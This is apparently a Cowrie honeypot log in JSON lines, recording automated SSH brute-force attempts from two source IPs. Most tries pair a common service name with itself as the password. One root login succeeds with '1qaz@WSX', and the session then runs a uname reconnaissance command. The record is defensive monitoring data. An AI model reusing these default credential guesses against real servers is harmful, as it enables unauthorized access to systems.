{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:11.975726Z","src_ip":"212.227.125.160","session":"d08fc33e0810"}
{"eventid":"cowrie.login.failed","username":"suporte","password":"suporte","message":"login attempt [suporte/suporte] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:12.675537Z","src_ip":"212.227.125.160","session":"d08fc33e0810"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:13.723471Z","src_ip":"212.227.125.160","session":"d08fc33e0810"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44668,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ffe5cad7b2e","protocol":"ssh","message":"New connection: 212.227.125.160:44668 (1.2.3.4:22) [session: 0ffe5cad7b2e]","sensor":"my-vps","timestamp":"2025-08-26T21:42:17.207531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:17.213304Z","src_ip":"212.227.125.160","session":"0ffe5cad7b2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:17.272886Z","src_ip":"212.227.125.160","session":"0ffe5cad7b2e"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:17.461401Z","src_ip":"212.227.125.160","session":"0ffe5cad7b2e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:18.523198Z","src_ip":"212.227.125.160","session":"0ffe5cad7b2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40060,"dst_ip":"1.2.3.4","dst_port":22,"session":"f87cf92f18b4","protocol":"ssh","message":"New connection: 212.227.125.160:40060 (1.2.3.4:22) [session: f87cf92f18b4]","sensor":"my-vps","timestamp":"2025-08-26T21:42:22.824219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:22.825516Z","src_ip":"212.227.125.160","session":"f87cf92f18b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:22.870800Z","src_ip":"212.227.125.160","session":"f87cf92f18b4"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:23.013088Z","src_ip":"212.227.125.160","session":"f87cf92f18b4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:24.192571Z","src_ip":"212.227.125.160","session":"f87cf92f18b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40290,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d420d1eecd6","protocol":"ssh","message":"New connection: 212.227.235.229:40290 (1.2.3.4:22) [session: 2d420d1eecd6]","sensor":"my-vps","timestamp":"2025-08-26T21:42:28.072665Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35444,"dst_ip":"1.2.3.4","dst_port":22,"session":"83916b3b9207","protocol":"ssh","message":"New connection: 212.227.125.160:35444 (1.2.3.4:22) [session: 83916b3b9207]","sensor":"my-vps","timestamp":"2025-08-26T21:42:28.239068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:28.247866Z","src_ip":"212.227.125.160","session":"83916b3b9207"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:28.303574Z","src_ip":"212.227.125.160","session":"83916b3b9207"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:28.358857Z","src_ip":"212.227.235.229","session":"2d420d1eecd6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:42:28.359554Z","src_ip":"212.227.235.229","session":"2d420d1eecd6"}
{"eventid":"cowrie.login.failed","username":"webuzo","password":"webuzo","message":"login attempt [webuzo/webuzo] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:28.517082Z","src_ip":"212.227.125.160","session":"83916b3b9207"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwerty","message":"login attempt [admin/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:29.233140Z","src_ip":"212.227.235.229","session":"2d420d1eecd6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:29.584033Z","src_ip":"212.227.125.160","session":"83916b3b9207"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:30.496982Z","src_ip":"212.227.235.229","session":"2d420d1eecd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59064,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5a29e03ef4d","protocol":"ssh","message":"New connection: 212.227.125.160:59064 (1.2.3.4:22) [session: a5a29e03ef4d]","sensor":"my-vps","timestamp":"2025-08-26T21:42:33.690528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:33.691411Z","src_ip":"212.227.125.160","session":"a5a29e03ef4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:33.744092Z","src_ip":"212.227.125.160","session":"a5a29e03ef4d"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"administrator","message":"login attempt [administrator/administrator] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:34.187745Z","src_ip":"212.227.125.160","session":"a5a29e03ef4d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:35.265244Z","src_ip":"212.227.125.160","session":"a5a29e03ef4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54446,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b85f8935037","protocol":"ssh","message":"New connection: 212.227.125.160:54446 (1.2.3.4:22) [session: 9b85f8935037]","sensor":"my-vps","timestamp":"2025-08-26T21:42:39.061195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:39.062699Z","src_ip":"212.227.125.160","session":"9b85f8935037"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:39.185623Z","src_ip":"212.227.125.160","session":"9b85f8935037"}
{"eventid":"cowrie.login.failed","username":"fivem","password":"fivem","message":"login attempt [fivem/fivem] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:39.800341Z","src_ip":"212.227.125.160","session":"9b85f8935037"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:40.864331Z","src_ip":"212.227.125.160","session":"9b85f8935037"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49836,"dst_ip":"1.2.3.4","dst_port":22,"session":"8208b7276581","protocol":"ssh","message":"New connection: 212.227.125.160:49836 (1.2.3.4:22) [session: 8208b7276581]","sensor":"my-vps","timestamp":"2025-08-26T21:42:45.116786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:45.130306Z","src_ip":"212.227.125.160","session":"8208b7276581"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:45.205678Z","src_ip":"212.227.125.160","session":"8208b7276581"}
{"eventid":"cowrie.login.failed","username":"emregover","password":"emregover","message":"login attempt [emregover/emregover] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:45.437183Z","src_ip":"212.227.125.160","session":"8208b7276581"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:46.490332Z","src_ip":"212.227.125.160","session":"8208b7276581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45224,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcc8d0b4bde4","protocol":"ssh","message":"New connection: 212.227.125.160:45224 (1.2.3.4:22) [session: fcc8d0b4bde4]","sensor":"my-vps","timestamp":"2025-08-26T21:42:50.731454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:50.733657Z","src_ip":"212.227.125.160","session":"fcc8d0b4bde4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:50.789222Z","src_ip":"212.227.125.160","session":"fcc8d0b4bde4"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:51.006148Z","src_ip":"212.227.125.160","session":"fcc8d0b4bde4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:52.196939Z","src_ip":"212.227.125.160","session":"fcc8d0b4bde4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40610,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaa43b2d68b2","protocol":"ssh","message":"New connection: 212.227.125.160:40610 (1.2.3.4:22) [session: aaa43b2d68b2]","sensor":"my-vps","timestamp":"2025-08-26T21:42:56.887044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:56.888654Z","src_ip":"212.227.125.160","session":"aaa43b2d68b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:57.273180Z","src_ip":"212.227.125.160","session":"aaa43b2d68b2"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:42:57.481769Z","src_ip":"212.227.125.160","session":"aaa43b2d68b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:42:57.788709Z","src_ip":"212.227.125.160","session":"aaa43b2d68b2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:42:57.789467Z","src_ip":"212.227.125.160","session":"aaa43b2d68b2"}
